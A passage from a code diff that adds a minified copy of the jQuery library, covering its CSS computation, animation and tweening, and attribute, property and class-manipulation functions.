+ s = e.style;
2388
+ return (
2389
+ (n = n || eO(e)) &&
2390
+ ("" !== (a = n.getPropertyValue(t) || n[t]) || ei(e) || (a = b.style(e, t)),
2391
+ !d.pixelBoxStyles() && eP.test(a) && eI.test(t) && ((r = s.width), (i = s.minWidth), (o = s.maxWidth), (s.minWidth = s.maxWidth = s.width = a), (a = n.width), (s.width = r), (s.minWidth = i), (s.maxWidth = o))),
2392
+ void 0 !== a ? a + "" : a
2393
+ );
2394
+ }
2395
+ function eW(e, t) {
2396
+ return {
2397
+ get: function () {
2398
+ if (!e()) return (this.get = t).apply(this, arguments);
2399
+ delete this.get;
2400
+ },
2401
+ };
2402
+ }
2403
+ !(function () {
2404
+ function t() {
2405
+ if (c) {
2406
+ (l.style.cssText = "position:absolute;left:-11111px;width:60px;margin-top:1px;padding:0;border:0"),
2407
+ (c.style.cssText = "position:relative;display:block;box-sizing:border-box;overflow:scroll;margin:auto;border:1px;padding:1px;width:60%;top:1%"),
2408
+ er.appendChild(l).appendChild(c);
2409
+ var t = e.getComputedStyle(c);
2410
+ (r = "1%" !== t.top),
2411
+ (u = 12 === n(t.marginLeft)),
2412
+ (c.style.right = "60%"),
2413
+ (a = 36 === n(t.right)),
2414
+ (i = 36 === n(t.width)),
2415
+ (c.style.position = "absolute"),
2416
+ (o = 12 === n(c.offsetWidth / 3)),
2417
+ er.removeChild(l),
2418
+ (c = null);
2419
+ }
2420
+ }
2421
+ function n(e) {
2422
+ return Math.round(parseFloat(e));
2423
+ }
2424
+ var r,
2425
+ i,
2426
+ o,
2427
+ a,
2428
+ s,
2429
+ u,
2430
+ l = v.createElement("div"),
2431
+ c = v.createElement("div");
2432
+ c.style &&
2433
+ ((c.style.backgroundClip = "content-box"),
2434
+ (c.cloneNode(!0).style.backgroundClip = ""),
2435
+ (d.clearCloneStyle = "content-box" === c.style.backgroundClip),
2436
+ b.extend(d, {
2437
+ boxSizingReliable: function () {
2438
+ return t(), i;
2439
+ },
2440
+ pixelBoxStyles: function () {
2441
+ return t(), a;
2442
+ },
2443
+ pixelPosition: function () {
2444
+ return t(), r;
2445
+ },
2446
+ reliableMarginLeft: function () {
2447
+ return t(), u;
2448
+ },
2449
+ scrollboxSize: function () {
2450
+ return t(), o;
2451
+ },
2452
+ reliableTrDimensions: function () {
2453
+ var t, n, r, i;
2454
+ return (
2455
+ null == s &&
2456
+ ((t = v.createElement("table")),
2457
+ (n = v.createElement("tr")),
2458
+ (r = v.createElement("div")),
2459
+ (t.style.cssText = "position:absolute;left:-11111px;border-collapse:separate"),
2460
+ (n.style.cssText = "border:1px solid"),
2461
+ (n.style.height = "1px"),
2462
+ (r.style.height = "9px"),
2463
+ (r.style.display = "block"),
2464
+ er.appendChild(t).appendChild(n).appendChild(r),
2465
+ (s = parseInt((i = e.getComputedStyle(n)).height, 10) + parseInt(i.borderTopWidth, 10) + parseInt(i.borderBottomWidth, 10) === n.offsetHeight),
2466
+ er.removeChild(t)),
2467
+ s
2468
+ );
2469
+ },
2470
+ }));
2471
+ })();
2472
+ var e1 = ["Webkit", "Moz", "ms"],
2473
+ eB = v.createElement("div").style,
2474
+ e9 = {};
2475
+ function eR(e) {
2476
+ return (
2477
+ b.cssProps[e] ||
2478
+ e9[e] ||
2479
+ (e in eB
2480
+ ? e
2481
+ : (e9[e] =
2482
+ (function (e) {
2483
+ for (var t = e[0].toUpperCase() + e.slice(1), n = e1.length; n--; ) if ((e = e1[n] + t) in eB) return e;
2484
+ })(e) || e))
2485
+ );
2486
+ }
2487
+ var eF = /^(none|table(?!-c[ea]).+)/,
2488
+ e8 = /^--/,
2489
+ ez = { position: "absolute", visibility: "hidden", display: "block" },
2490
+ eX = { letterSpacing: "0", fontWeight: "400" };
2491
+ function e2(e, t, n) {
2492
+ var r = et.exec(t);
2493
+ return r ? Math.max(0, r[2] - (n || 0)) + (r[3] || "px") : t;
2494
+ }
2495
+ function e4(e, t, n, r, i, o) {
2496
+ var a = "width" === t ? 1 : 0,
2497
+ s = 0,
2498
+ u = 0;
2499
+ if (n === (r ? "border" : "content")) return 0;
2500
+ for (; a < 4; a += 2)
2501
+ "margin" === n && (u += b.css(e, n + en[a], !0, i)),
2502
+ r
2503
+ ? ("content" === n && (u -= b.css(e, "padding" + en[a], !0, i)), "margin" !== n && (u -= b.css(e, "border" + en[a] + "Width", !0, i)))
2504
+ : ((u += b.css(e, "padding" + en[a], !0, i)), "padding" !== n ? (u += b.css(e, "border" + en[a] + "Width", !0, i)) : (s += b.css(e, "border" + en[a] + "Width", !0, i)));
2505
+ return !r && o >= 0 && (u += Math.max(0, Math.ceil(e["offset" + t[0].toUpperCase() + t.slice(1)] - o - u - s - 0.5)) || 0), u;
2506
+ }
2507
+ function eU(e, t, n) {
2508
+ var r = eO(e),
2509
+ i = (!d.boxSizingReliable() || n) && "border-box" === b.css(e, "boxSizing", !1, r),
2510
+ o = i,
2511
+ a = eM(e, t, r),
2512
+ s = "offset" + t[0].toUpperCase() + t.slice(1);
2513
+ if (eP.test(a)) {
2514
+ if (!n) return a;
2515
+ a = "auto";
2516
+ }
2517
+ return (
2518
+ ((!d.boxSizingReliable() && i) || (!d.reliableTrDimensions() && S(e, "tr")) || "auto" === a || (!parseFloat(a) && "inline" === b.css(e, "display", !1, r))) &&
2519
+ e.getClientRects().length &&
2520
+ ((i = "border-box" === b.css(e, "boxSizing", !1, r)), (o = s in e) && (a = e[s])),
2521
+ (a = parseFloat(a) || 0) + e4(e, t, n || (i ? "border" : "content"), o, r, a) + "px"
2522
+ );
2523
+ }
2524
+ function e3(e, t, n, r, i) {
2525
+ return new e3.prototype.init(e, t, n, r, i);
2526
+ }
2527
+ b.extend({
2528
+ cssHooks: {
2529
+ opacity: {
2530
+ get: function (e, t) {
2531
+ if (t) {
2532
+ var n = eM(e, "opacity");
2533
+ return "" === n ? "1" : n;
2534
+ }
2535
+ },
2536
+ },
2537
+ },
2538
+ cssNumber: {
2539
+ animationIterationCount: !0,
2540
+ columnCount: !0,
2541
+ fillOpacity: !0,
2542
+ flexGrow: !0,
2543
+ flexShrink: !0,
2544
+ fontWeight: !0,
2545
+ gridArea: !0,
2546
+ gridColumn: !0,
2547
+ gridColumnEnd: !0,
2548
+ gridColumnStart: !0,
2549
+ gridRow: !0,
2550
+ gridRowEnd: !0,
2551
+ gridRowStart: !0,
2552
+ lineHeight: !0,
2553
+ opacity: !0,
2554
+ order: !0,
2555
+ orphans: !0,
2556
+ widows: !0,
2557
+ zIndex: !0,
2558
+ zoom: !0,
2559
+ },
2560
+ cssProps: {},
2561
+ style: function (e, t, n, r) {
2562
+ if (e && 3 !== e.nodeType && 8 !== e.nodeType && e.style) {
2563
+ var i,
2564
+ o,
2565
+ a,
2566
+ s = U(t),
2567
+ u = e8.test(t),
2568
+ l = e.style;
2569
+ if ((u || (t = eR(s)), (a = b.cssHooks[t] || b.cssHooks[s]), void 0 === n)) return a && "get" in a && void 0 !== (i = a.get(e, !1, r)) ? i : l[t];
2570
+ "string" == (o = typeof n) && (i = et.exec(n)) && i[1] && ((n = es(e, t, i)), (o = "number")),
2571
+ null != n &&
2572
+ n == n &&
2573
+ ("number" !== o || u || (n += (i && i[3]) || (b.cssNumber[s] ? "" : "px")),
2574
+ d.clearCloneStyle || "" !== n || 0 !== t.indexOf("background") || (l[t] = "inherit"),
2575
+ (a && "set" in a && void 0 === (n = a.set(e, n, r))) || (u ? l.setProperty(t, n) : (l[t] = n)));
2576
+ }
2577
+ },
2578
+ css: function (e, t, n, r) {
2579
+ var i,
2580
+ o,
2581
+ a,
2582
+ s = U(t);
2583
+ return (
2584
+ e8.test(t) || (t = eR(s)),
2585
+ (a = b.cssHooks[t] || b.cssHooks[s]) && "get" in a && (i = a.get(e, !0, n)),
2586
+ void 0 === i && (i = eM(e, t, r)),
2587
+ "normal" === i && t in eX && (i = eX[t]),
2588
+ "" === n || n ? ((o = parseFloat(i)), !0 === n || isFinite(o) ? o || 0 : i) : i
2589
+ );
2590
+ },
2591
+ }),
2592
+ b.each(["height", "width"], function (e, t) {
2593
+ b.cssHooks[t] = {
2594
+ get: function (e, n, r) {
2595
+ if (n)
2596
+ return !eF.test(b.css(e, "display")) || (e.getClientRects().length && e.getBoundingClientRect().width)
2597
+ ? eU(e, t, r)
2598
+ : e0(e, ez, function () {
2599
+ return eU(e, t, r);
2600
+ });
2601
+ },
2602
+ set: function (e, n, r) {
2603
+ var i,
2604
+ o = eO(e),
2605
+ a = !d.scrollboxSize() && "absolute" === o.position,
2606
+ s = (a || r) && "border-box" === b.css(e, "boxSizing", !1, o),
2607
+ u = r ? e4(e, t, r, s, o) : 0;
2608
+ return (
2609
+ s && a && (u -= Math.ceil(e["offset" + t[0].toUpperCase() + t.slice(1)] - parseFloat(o[t]) - e4(e, t, "border", !1, o) - 0.5)),
2610
+ u && (i = et.exec(n)) && "px" !== (i[3] || "px") && ((e.style[t] = n), (n = b.css(e, t))),
2611
+ e2(0, n, u)
2612
+ );
2613
+ },
2614
+ };
2615
+ }),
2616
+ (b.cssHooks.marginLeft = eW(d.reliableMarginLeft, function (e, t) {
2617
+ if (t)
2618
+ return (
2619
+ (parseFloat(eM(e, "marginLeft")) ||
2620
+ e.getBoundingClientRect().left -
2621
+ e0(e, { marginLeft: 0 }, function () {
2622
+ return e.getBoundingClientRect().left;
2623
+ })) + "px"
2624
+ );
2625
+ })),
2626
+ b.each({ margin: "", padding: "", border: "Width" }, function (e, t) {
2627
+ (b.cssHooks[e + t] = {
2628
+ expand: function (n) {
2629
+ for (var r = 0, i = {}, o = "string" == typeof n ? n.split(" ") : [n]; r < 4; r++) i[e + en[r] + t] = o[r] || o[r - 2] || o[0];
2630
+ return i;
2631
+ },
2632
+ }),
2633
+ "margin" !== e && (b.cssHooks[e + t].set = e2);
2634
+ }),
2635
+ b.fn.extend({
2636
+ css: function (e, t) {
2637
+ return R(
2638
+ this,
2639
+ function (e, t, n) {
2640
+ var r,
2641
+ i,
2642
+ o = {},
2643
+ a = 0;
2644
+ if (Array.isArray(t)) {
2645
+ for (r = eO(e), i = t.length; a < i; a++) o[t[a]] = b.css(e, t[a], !1, r);
2646
+ return o;
2647
+ }
2648
+ return void 0 !== n ? b.style(e, t, n) : b.css(e, t);
2649
+ },
2650
+ e,
2651
+ t,
2652
+ arguments.length > 1
2653
+ );
2654
+ },
2655
+ }),
2656
+ (b.Tween = e3),
2657
+ (e3.prototype = {
2658
+ constructor: e3,
2659
+ init: function (e, t, n, r, i, o) {
2660
+ (this.elem = e), (this.prop = n), (this.easing = i || b.easing._default), (this.options = t), (this.start = this.now = this.cur()), (this.end = r), (this.unit = o || (b.cssNumber[n] ? "" : "px"));
2661
+ },
2662
+ cur: function () {
2663
+ var e = e3.propHooks[this.prop];
2664
+ return e && e.get ? e.get(this) : e3.propHooks._default.get(this);
2665
+ },
2666
+ run: function (e) {
2667
+ var t,
2668
+ n = e3.propHooks[this.prop];
2669
+ return (
2670
+ this.options.duration ? (this.pos = t = b.easing[this.easing](e, this.options.duration * e, 0, 1, this.options.duration)) : (this.pos = t = e),
2671
+ (this.now = (this.end - this.start) * t + this.start),
2672
+ this.options.step && this.options.step.call(this.elem, this.now, this),
2673
+ n && n.set ? n.set(this) : e3.propHooks._default.set(this),
2674
+ this
2675
+ );
2676
+ },
2677
+ }),
2678
+ (e3.prototype.init.prototype = e3.prototype),
2679
+ (e3.propHooks = {
2680
+ _default: {
2681
+ get: function (e) {
2682
+ var t;
2683
+ return 1 !== e.elem.nodeType || (null != e.elem[e.prop] && null == e.elem.style[e.prop]) ? e.elem[e.prop] : (t = b.css(e.elem, e.prop, "")) && "auto" !== t ? t : 0;
2684
+ },
2685
+ set: function (e) {
2686
+ b.fx.step[e.prop] ? b.fx.step[e.prop](e) : 1 === e.elem.nodeType && (b.cssHooks[e.prop] || null != e.elem.style[eR(e.prop)]) ? b.style(e.elem, e.prop, e.now + e.unit) : (e.elem[e.prop] = e.now);
2687
+ },
2688
+ },
2689
+ }),
2690
+ (e3.propHooks.scrollTop = e3.propHooks.scrollLeft = {
2691
+ set: function (e) {
2692
+ e.elem.nodeType && e.elem.parentNode && (e.elem[e.prop] = e.now);
2693
+ },
2694
+ }),
2695
+ (b.easing = {
2696
+ linear: function (e) {
2697
+ return e;
2698
+ },
2699
+ swing: function (e) {
2700
+ return 0.5 - Math.cos(e * Math.PI) / 2;
2701
+ },
2702
+ _default: "swing",
2703
+ }),
2704
+ (b.fx = e3.prototype.init),
2705
+ (b.fx.step = {});
2706
+ var e7,
2707
+ eV,
2708
+ eG = /^(?:toggle|show|hide)$/,
2709
+ eY = /queueHooks$/;
2710
+ function eQ() {
2711
+ return (
2712
+ e.setTimeout(function () {
2713
+ e7 = void 0;
2714
+ }),
2715
+ (e7 = Date.now())
2716
+ );
2717
+ }
2718
+ function e6(e, t) {
2719
+ var n,
2720
+ r = 0,
2721
+ i = { height: e };
2722
+ for (t = t ? 1 : 0; r < 4; r += 2 - t) i["margin" + (n = en[r])] = i["padding" + n] = e;
2723
+ return t && (i.opacity = i.width = e), i;
2724
+ }
2725
+ function eK(e, t, n) {
2726
+ for (var r, i = (e5.tweeners[t] || []).concat(e5.tweeners["*"]), o = 0, a = i.length; o < a; o++) if ((r = i[o].call(n, t, e))) return r;
2727
+ }
2728
+ function e5(e, t, n) {
2729
+ var r,
2730
+ i,
2731
+ o = 0,
2732
+ a = e5.prefilters.length,
2733
+ s = b.Deferred().always(function () {
2734
+ delete u.elem;
2735
+ }),
2736
+ u = function () {
2737
+ if (i) return !1;
2738
+ for (var t = e7 || eQ(), n = Math.max(0, l.startTime + l.duration - t), r = 1 - (n / l.duration || 0), o = 0, a = l.tweens.length; o < a; o++) l.tweens[o].run(r);
2739
+ return s.notifyWith(e, [l, r, n]), r < 1 && a ? n : (a || s.notifyWith(e, [l, 1, 0]), s.resolveWith(e, [l]), !1);
2740
+ },
2741
+ l = s.promise({
2742
+ elem: e,
2743
+ props: b.extend({}, t),
2744
+ opts: b.extend(!0, { specialEasing: {}, easing: b.easing._default }, n),
2745
+ originalProperties: t,
2746
+ originalOptions: n,
2747
+ startTime: e7 || eQ(),
2748
+ duration: n.duration,
2749
+ tweens: [],
2750
+ createTween: function (t, n) {
2751
+ var r = b.Tween(e, l.opts, t, n, l.opts.specialEasing[t] || l.opts.easing);
2752
+ return l.tweens.push(r), r;
2753
+ },
2754
+ stop: function (t) {
2755
+ var n = 0,
2756
+ r = t ? l.tweens.length : 0;
2757
+ if (i) return this;
2758
+ for (i = !0; n < r; n++) l.tweens[n].run(1);
2759
+ return t ? (s.notifyWith(e, [l, 1, 0]), s.resolveWith(e, [l, t])) : s.rejectWith(e, [l, t]), this;
2760
+ },
2761
+ }),
2762
+ c = l.props;
2763
+ for (
2764
+ !(function (e, t) {
2765
+ var n, r, i, o, a;
2766
+ for (n in e)
2767
+ if (((i = t[(r = U(n))]), Array.isArray((o = e[n])) && ((i = o[1]), (o = e[n] = o[0])), n !== r && ((e[r] = o), delete e[n]), (a = b.cssHooks[r]) && ("expand" in a)))
2768
+ for (n in ((o = a.expand(o)), delete e[r], o)) (n in e) || ((e[n] = o[n]), (t[n] = i));
2769
+ else t[r] = i;
2770
+ })(c, l.opts.specialEasing);
2771
+ o < a;
2772
+ o++
2773
+ )
2774
+ if ((r = e5.prefilters[o].call(l, e, c, l.opts))) return h(r.stop) && (b._queueHooks(l.elem, l.opts.queue).stop = r.stop.bind(r)), r;
2775
+ return (
2776
+ b.map(c, eK, l),
2777
+ h(l.opts.start) && l.opts.start.call(e, l),
2778
+ l.progress(l.opts.progress).done(l.opts.done, l.opts.complete).fail(l.opts.fail).always(l.opts.always),
2779
+ b.fx.timer(b.extend(u, { elem: e, anim: l, queue: l.opts.queue })),
2780
+ l
2781
+ );
2782
+ }
2783
+ (b.Animation = b.extend(e5, {
2784
+ tweeners: {
2785
+ "*": [
2786
+ function (e, t) {
2787
+ var n = this.createTween(e, t);
2788
+ return es(n.elem, e, et.exec(t), n), n;
2789
+ },
2790
+ ],
2791
+ },
2792
+ tweener: function (e, t) {
2793
+ h(e) ? ((t = e), (e = ["*"])) : (e = e.match(H));
2794
+ for (var n, r = 0, i = e.length; r < i; r++) (n = e[r]), (e5.tweeners[n] = e5.tweeners[n] || []), e5.tweeners[n].unshift(t);
2795
+ },
2796
+ prefilters: [
2797
+ function (e, t, n) {
2798
+ var r,
2799
+ i,
2800
+ o,
2801
+ a,
2802
+ s,
2803
+ u,
2804
+ l,
2805
+ c,
2806
+ f = "width" in t || "height" in t,
2807
+ p = this,
2808
+ d = {},
2809
+ h = e.style,
2810
+ g = e.nodeType && ea(e),
2811
+ v = Y.get(e, "fxshow");
2812
+ for (r in (n.queue ||
2813
+ (null == (a = b._queueHooks(e, "fx")).unqueued &&
2814
+ ((a.unqueued = 0),
2815
+ (s = a.empty.fire),
2816
+ (a.empty.fire = function () {
2817
+ a.unqueued || s();
2818
+ })),
2819
+ a.unqueued++,
2820
+ p.always(function () {
2821
+ p.always(function () {
2822
+ a.unqueued--, b.queue(e, "fx").length || a.empty.fire();
2823
+ });
2824
+ })),
2825
+ t))
2826
+ if (((i = t[r]), eG.test(i))) {
2827
+ if ((delete t[r], (o = o || "toggle" === i), i === (g ? "hide" : "show"))) {
2828
+ if ("show" !== i || !v || void 0 === v[r]) continue;
2829
+ g = !0;
2830
+ }
2831
+ d[r] = (v && v[r]) || b.style(e, r);
2832
+ }
2833
+ if ((u = !b.isEmptyObject(t)) || !b.isEmptyObject(d))
2834
+ for (r in (f &&
2835
+ 1 === e.nodeType &&
2836
+ ((n.overflow = [h.overflow, h.overflowX, h.overflowY]),
2837
+ null == (l = v && v.display) && (l = Y.get(e, "display")),
2838
+ "none" === (c = b.css(e, "display")) && (l ? (c = l) : (ec([e], !0), (l = e.style.display || l), (c = b.css(e, "display")), ec([e]))),
2839
+ ("inline" === c || ("inline-block" === c && null != l)) &&
2840
+ "none" === b.css(e, "float") &&
2841
+ (u ||
2842
+ (p.done(function () {
2843
+ h.display = l;
2844
+ }),
2845
+ null == l && (l = "none" === (c = h.display) ? "" : c)),
2846
+ (h.display = "inline-block"))),
2847
+ n.overflow &&
2848
+ ((h.overflow = "hidden"),
2849
+ p.always(function () {
2850
+ (h.overflow = n.overflow[0]), (h.overflowX = n.overflow[1]), (h.overflowY = n.overflow[2]);
2851
+ })),
2852
+ (u = !1),
2853
+ d))
2854
+ u ||
2855
+ (v ? "hidden" in v && (g = v.hidden) : (v = Y.access(e, "fxshow", { display: l })),
2856
+ o && (v.hidden = !g),
2857
+ g && ec([e], !0),
2858
+ p.done(function () {
2859
+ for (r in (g || ec([e]), Y.remove(e, "fxshow"), d)) b.style(e, r, d[r]);
2860
+ })),
2861
+ (u = eK(g ? v[r] : 0, r, p)),
2862
+ r in v || ((v[r] = u.start), g && ((u.end = u.start), (u.start = 0)));
2863
+ },
2864
+ ],
2865
+ prefilter: function (e, t) {
2866
+ t ? e5.prefilters.unshift(e) : e5.prefilters.push(e);
2867
+ },
2868
+ })),
2869
+ (b.speed = function (e, t, n) {
2870
+ var r = e && "object" == typeof e ? b.extend({}, e) : { complete: n || (!n && t) || (h(e) && e), duration: e, easing: (n && t) || (t && !h(t) && t) };
2871
+ return (
2872
+ b.fx.off ? (r.duration = 0) : "number" != typeof r.duration && (r.duration in b.fx.speeds ? (r.duration = b.fx.speeds[r.duration]) : (r.duration = b.fx.speeds._default)),
2873
+ (null != r.queue && !0 !== r.queue) || (r.queue = "fx"),
2874
+ (r.old = r.complete),
2875
+ (r.complete = function () {
2876
+ h(r.old) && r.old.call(this), r.queue && b.dequeue(this, r.queue);
2877
+ }),
2878
+ r
2879
+ );
2880
+ }),
2881
+ b.fn.extend({
2882
+ fadeTo: function (e, t, n, r) {
2883
+ return this.filter(ea).css("opacity", 0).show().end().animate({ opacity: t }, e, n, r);
2884
+ },
2885
+ animate: function (e, t, n, r) {
2886
+ var i = b.isEmptyObject(e),
2887
+ o = b.speed(t, n, r),
2888
+ a = function () {
2889
+ var t = e5(this, b.extend({}, e), o);
2890
+ (i || Y.get(this, "finish")) && t.stop(!0);
2891
+ };
2892
+ return (a.finish = a), i || !1 === o.queue ? this.each(a) : this.queue(o.queue, a);
2893
+ },
2894
+ stop: function (e, t, n) {
2895
+ var r = function (e) {
2896
+ var t = e.stop;
2897
+ delete e.stop, t(n);
2898
+ };
2899
+ return (
2900
+ "string" != typeof e && ((n = t), (t = e), (e = void 0)),
2901
+ t && this.queue(e || "fx", []),
2902
+ this.each(function () {
2903
+ var t = !0,
2904
+ i = null != e && e + "queueHooks",
2905
+ o = b.timers,
2906
+ a = Y.get(this);
2907
+ if (i) a[i] && a[i].stop && r(a[i]);
2908
+ else for (i in a) a[i] && a[i].stop && eY.test(i) && r(a[i]);
2909
+ for (i = o.length; i--; ) o[i].elem !== this || (null != e && o[i].queue !== e) || (o[i].anim.stop(n), (t = !1), o.splice(i, 1));
2910
+ (!t && n) || b.dequeue(this, e);
2911
+ })
2912
+ );
2913
+ },
2914
+ finish: function (e) {
2915
+ return (
2916
+ !1 !== e && (e = e || "fx"),
2917
+ this.each(function () {
2918
+ var t,
2919
+ n = Y.get(this),
2920
+ r = n[e + "queue"],
2921
+ i = n[e + "queueHooks"],
2922
+ o = b.timers,
2923
+ a = r ? r.length : 0;
2924
+ for (n.finish = !0, b.queue(this, e, []), i && i.stop && i.stop.call(this, !0), t = o.length; t--; ) o[t].elem === this && o[t].queue === e && (o[t].anim.stop(!0), o.splice(t, 1));
2925
+ for (t = 0; t < a; t++) r[t] && r[t].finish && r[t].finish.call(this);
2926
+ delete n.finish;
2927
+ })
2928
+ );
2929
+ },
2930
+ }),
2931
+ b.each(["toggle", "show", "hide"], function (e, t) {
2932
+ var n = b.fn[t];
2933
+ b.fn[t] = function (e, r, i) {
2934
+ return null == e || "boolean" == typeof e ? n.apply(this, arguments) : this.animate(e6(t, !0), e, r, i);
2935
+ };
2936
+ }),
2937
+ b.each({ slideDown: e6("show"), slideUp: e6("hide"), slideToggle: e6("toggle"), fadeIn: { opacity: "show" }, fadeOut: { opacity: "hide" }, fadeToggle: { opacity: "toggle" } }, function (e, t) {
2938
+ b.fn[e] = function (e, n, r) {
2939
+ return this.animate(t, e, n, r);
2940
+ };
2941
+ }),
2942
+ (b.timers = []),
2943
+ (b.fx.tick = function () {
2944
+ var e,
2945
+ t = 0,
2946
+ n = b.timers;
2947
+ for (e7 = Date.now(); t < n.length; t++) (e = n[t])() || n[t] !== e || n.splice(t--, 1);
2948
+ n.length || b.fx.stop(), (e7 = void 0);
2949
+ }),
2950
+ (b.fx.timer = function (e) {
2951
+ b.timers.push(e), b.fx.start();
2952
+ }),
2953
+ (b.fx.interval = 13),
2954
+ (b.fx.start = function () {
2955
+ eV ||
2956
+ ((eV = !0),
2957
+ (function t() {
2958
+ eV && (!1 === v.hidden && e.requestAnimationFrame ? e.requestAnimationFrame(t) : e.setTimeout(t, b.fx.interval), b.fx.tick());
2959
+ })());
2960
+ }),
2961
+ (b.fx.stop = function () {
2962
+ eV = null;
2963
+ }),
2964
+ (b.fx.speeds = { slow: 600, fast: 200, _default: 400 }),
2965
+ (b.fn.delay = function (t, n) {
2966
+ return (
2967
+ (t = (b.fx && b.fx.speeds[t]) || t),
2968
+ (n = n || "fx"),
2969
+ this.queue(n, function (n, r) {
2970
+ var i = e.setTimeout(n, t);
2971
+ r.stop = function () {
2972
+ e.clearTimeout(i);
2973
+ };
2974
+ })
2975
+ );
2976
+ }),
2977
+ (eJ = v.createElement("input")),
2978
+ (eZ = v.createElement("select").appendChild(v.createElement("option"))),
2979
+ (eJ.type = "checkbox"),
2980
+ (d.checkOn = "" !== eJ.value),
2981
+ (d.optSelected = eZ.selected),
2982
+ ((eJ = v.createElement("input")).value = "t"),
2983
+ (eJ.type = "radio"),
2984
+ (d.radioValue = "t" === eJ.value);
2985
+ var eJ,
2986
+ eZ,
2987
+ te,
2988
+ tt = b.expr.attrHandle;
2989
+ b.fn.extend({
2990
+ attr: function (e, t) {
2991
+ return R(this, b.attr, e, t, arguments.length > 1);
2992
+ },
2993
+ removeAttr: function (e) {
2994
+ return this.each(function () {
2995
+ b.removeAttr(this, e);
2996
+ });
2997
+ },
2998
+ }),
2999
+ b.extend({
3000
+ attr: function (e, t, n) {
3001
+ var r,
3002
+ i,
3003
+ o = e.nodeType;
3004
+ if (3 !== o && 8 !== o && 2 !== o)
3005
+ return void 0 === e.getAttribute
3006
+ ? b.prop(e, t, n)
3007
+ : ((1 === o && b.isXMLDoc(e)) || (i = b.attrHooks[t.toLowerCase()] || (b.expr.match.bool.test(t) ? te : void 0)),
3008
+ void 0 !== n
3009
+ ? null === n
3010
+ ? void b.removeAttr(e, t)
3011
+ : i && "set" in i && void 0 !== (r = i.set(e, n, t))
3012
+ ? r
3013
+ : (e.setAttribute(t, n + ""), n)
3014
+ : i && "get" in i && null !== (r = i.get(e, t))
3015
+ ? r
3016
+ : null == (r = b.find.attr(e, t))
3017
+ ? void 0
3018
+ : r);
3019
+ },
3020
+ attrHooks: {
3021
+ type: {
3022
+ set: function (e, t) {
3023
+ if (!d.radioValue && "radio" === t && S(e, "input")) {
3024
+ var n = e.value;
3025
+ return e.setAttribute("type", t), n && (e.value = n), t;
3026
+ }
3027
+ },
3028
+ },
3029
+ },
3030
+ removeAttr: function (e, t) {
3031
+ var n,
3032
+ r = 0,
3033
+ i = t && t.match(H);
3034
+ if (i && 1 === e.nodeType) for (; (n = i[r++]); ) e.removeAttribute(n);
3035
+ },
3036
+ }),
3037
+ (te = {
3038
+ set: function (e, t, n) {
3039
+ return !1 === t ? b.removeAttr(e, n) : e.setAttribute(n, n), n;
3040
+ },
3041
+ }),
3042
+ b.each(b.expr.match.bool.source.match(/\w+/g), function (e, t) {
3043
+ var n = tt[t] || b.find.attr;
3044
+ tt[t] = function (e, t, r) {
3045
+ var i,
3046
+ o,
3047
+ a = t.toLowerCase();
3048
+ return r || ((o = tt[a]), (tt[a] = i), (i = null != n(e, t, r) ? a : null), (tt[a] = o)), i;
3049
+ };
3050
+ });
3051
+ var tn = /^(?:input|select|textarea|button)$/i,
3052
+ tr = /^(?:a|area)$/i;
3053
+ function ti(e) {
3054
+ return (e.match(H) || []).join(" ");
3055
+ }
3056
+ function to(e) {
3057
+ return (e.getAttribute && e.getAttribute("class")) || "";
3058
+ }
3059
+ function ta(e) {
3060
+ return Array.isArray(e) ? e : ("string" == typeof e && e.match(H)) || [];
3061
+ }
3062
+ b.fn.extend({
3063
+ prop: function (e, t) {
3064
+ return R(this, b.prop, e, t, arguments.length > 1);
3065
+ },
3066
+ removeProp: function (e) {
3067
+ return this.each(function () {
3068
+ delete this[b.propFix[e] || e];
3069
+ });
3070
+ },
3071
+ }),
3072
+ b.extend({
3073
+ prop: function (e, t, n) {
3074
+ var r,
3075
+ i,
3076
+ o = e.nodeType;
3077
+ if (3 !== o && 8 !== o && 2 !== o)
3078
+ return (
3079
+ (1 === o && b.isXMLDoc(e)) || ((t = b.propFix[t] || t), (i = b.propHooks[t])),
3080
+ void 0 !== n ? (i && "set" in i && void 0 !== (r = i.set(e, n, t)) ? r : (e[t] = n)) : i && "get" in i && null !== (r = i.get(e, t)) ? r : e[t]
3081
+ );
3082
+ },
3083
+ propHooks: {
3084
+ tabIndex: {
3085
+ get: function (e) {
3086
+ var t = b.find.attr(e, "tabindex");
3087
+ return t ? parseInt(t, 10) : tn.test(e.nodeName) || (tr.test(e.nodeName) && e.href) ? 0 : -1;
3088
+ },
3089
+ },
3090
+ },
3091
+ propFix: { for: "htmlFor", class: "className" },
3092
+ }),
3093
+ d.optSelected ||
3094
+ (b.propHooks.selected = {
3095
+ get: function (e) {
3096
+ var t = e.parentNode;
3097
+ return t && t.parentNode && t.parentNode.selectedIndex, null;
3098
+ },
3099
+ set: function (e) {
3100
+ var t = e.parentNode;
3101
+ t && (t.selectedIndex, t.parentNode && t.parentNode.selectedIndex);
3102
+ },
3103
+ }),
3104
+ b.each(["tabIndex", "readOnly", "maxLength", "cellSpacing", "cellPadding", "rowSpan", "colSpan", "useMap", "frameBorder", "contentEditable"], function () {
3105
+ b.propFix[this.toLowerCase()] = this;
3106
+ }),
3107
+ b.fn.extend({
3108
+ addClass: function (e) {
3109
+ var t,
3110
+ n,
3111
+ r,
3112
+ i,
3113
+ o,
3114
+ a,
3115
+ s,
3116
+ u = 0;
3117
+ if (h(e))
3118
+ return this.each(function (t) {
3119
+ b(this).addClass(e.call(this, t, to(this)));
3120
+ });
3121
+ if ((t = ta(e)).length) {
3122
+ for (; (n = this[u++]); )
3123
+ if (((i = to(n)), (r = 1 === n.nodeType && " " + ti(i) + " "))) {
3124
+ for (a = 0; (o = t[a++]); ) 0 > r.indexOf(" " + o + " ") && (r += o + " ");
3125
+ i !== (s = ti(r)) && n.setAttribute("class", s);
3126
+ }
3127
+ }
3128
+ return this;
3129
+ },
3130
+ removeClass: function (e) {
3131
+ var t,
3132
+ n,
3133
+ r,
3134
+ i,
3135
+ o,
3136
+ a,
3137
+ s,
3138
+ u = 0;
3139
+ if (h(e))
3140
+ return this.each(function (t) {
3141
+ b(this).removeClass(e.call(this, t, to(this)));
3142
+ });
3143
+ if (!arguments.length) return this.attr("class", "");
3144
+ if ((t = ta(e)).length) {
3145
+ for (; (n = this[u++]); )
3146
+ if (((i = to(n)), (r = 1 === n.nodeType && " " + ti(i) + " "))) {
3147
+ for (a = 0; (o = t[a++]); ) for (; r.indexOf(" " + o + " ") > -1; ) r = r.replace(" " + o + " ", " ");
3148
+ i !== (s = ti(r)) && n.setAttribute("class", s);
3149
+ }
3150
+ }
3151
+ return this;
3152
+ },
3153
